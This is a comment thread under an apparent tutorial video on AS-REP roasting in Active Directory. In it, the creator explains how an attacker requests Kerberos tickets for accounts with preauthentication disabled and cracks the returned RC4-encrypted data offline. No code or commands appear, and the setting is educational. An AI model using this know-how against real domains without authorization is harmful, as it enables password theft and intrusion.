You videos are exceptional thank you so much for taking the time to create these! It's evident that you know your stuff and as such are able to provide the information in a clear and concise way.
Hey there.. excellent video..between 02:14 to 02:20... I am trying to understand something...AS REQ has the time stamp encrypted the users password which is then decrypted by the AS in the KDC to verify the timestamp.....AS REP contains TGT and some data encrypted with the users password.... If our intention was to obtain just the users password, why not brute force the AS REQ instead of the AS-REP....Am i missing something here?
Great question! The AS_REQ is sent by the client. So the client would be the one performing that timestamp encryption with their password. Since we are the client in this case and we don't know the password, we cannot perform this encryption action. This is the reason that we need to target an account with Kerberos preauthentication disabled. Hope this helps to clarify!
@@c0nd4 still a bit confused..so if i am an attacker, and client is sending as_req which is timestamp encrypted by the user password...why cant I get target this and crack the password....
You are the attacker and the client. You aren't intercepting a request that the client makes, you are essentially "impersonating" the client. But you cannot prove you are the client by encrypting a timestamp with the client password, because you do not know it. So the only way for you to get the client's hash as an attacker is to find a client that doesn't require that encrypted timestamp (preauthentication), then you can send an AS_REQ without that encrypted timestamp. When you receive the TGT in the AS_REP, it will be encrypted with the NTLM hash of the client's password. We can then crack this. This is the first and know time in the process that the attacker will see something that is encrypted with the client's password hash. The encrypted timestamp is never sent at all because preauthentication is disabled.
@@c0nd4 Hey question, Comp sci major here studying for OSCP soon. I was under the impression that most encryptions standards are quite high now with AES, 3des and RSA. How are these password hashes getting cracked. They should be salted as well? This would take a quite strong computer and too much time to decrypt any hashes.
By default the TGT is encrypted with RC4 which is a weak algorithm. Even these other hash types can be cracked with enough resources. The hash rates on modern graphics cards are impressive, especially when used in parallel.
You videos are exceptional thank you so much for taking the time to create these! It's evident that you know your stuff and as such are able to provide the information in a clear and concise way.
Thank you for the awesome feedback! Glad you're enjoying the videos
Hi Conda, you explain very clearly, I don't have any AD experience but I was able to understand this video with no issues. keep up the great work!
Thank you so much!
Another great video thanks again!!!
Thanks. Very clear explanation
Amazing video, thanks!
Nicely Explained. Thank You !!!
Insightful!
Awesome video!!
you have a great content, I looking forward for your upcoming videos.
Thank you so much!
The content is on fire!!!!!
Thank you! 🔥🔥
Thanks man Your contents are very useful.
Thanks! I appreciate it 😁
thank you!
Very Well-Explained Good Content Just Like TCM-Security
Hey there.. excellent video..between 02:14 to 02:20... I am trying to understand something...AS REQ has the time stamp encrypted the users password which is then decrypted by the AS in the KDC to verify the timestamp.....AS REP contains TGT and some data encrypted with the users password.... If our intention was to obtain just the users password, why not brute force the AS REQ instead of the AS-REP....Am i missing something here?
Great question! The AS_REQ is sent by the client. So the client would be the one performing that timestamp encryption with their password. Since we are the client in this case and we don't know the password, we cannot perform this encryption action. This is the reason that we need to target an account with Kerberos preauthentication disabled.
Hope this helps to clarify!
@@c0nd4 still a bit confused..so if i am an attacker, and client is sending as_req which is timestamp encrypted by the user password...why cant I get target this and crack the password....
You are the attacker and the client. You aren't intercepting a request that the client makes, you are essentially "impersonating" the client. But you cannot prove you are the client by encrypting a timestamp with the client password, because you do not know it. So the only way for you to get the client's hash as an attacker is to find a client that doesn't require that encrypted timestamp (preauthentication), then you can send an AS_REQ without that encrypted timestamp. When you receive the TGT in the AS_REP, it will be encrypted with the NTLM hash of the client's password. We can then crack this. This is the first and know time in the process that the attacker will see something that is encrypted with the client's password hash. The encrypted timestamp is never sent at all because preauthentication is disabled.
@@c0nd4 Hey question, Comp sci major here studying for OSCP soon. I was under the impression that most encryptions standards are quite high now with AES, 3des and RSA. How are these password hashes getting cracked. They should be salted as well? This would take a quite strong computer and too much time to decrypt any hashes.
By default the TGT is encrypted with RC4 which is a weak algorithm. Even these other hash types can be cracked with enough resources. The hash rates on modern graphics cards are impressive, especially when used in parallel.
HOw do i know if the kerberos pre-auth is disabled. is there a nmap script that can be used?
+1 sub!
Amazing video, many thanks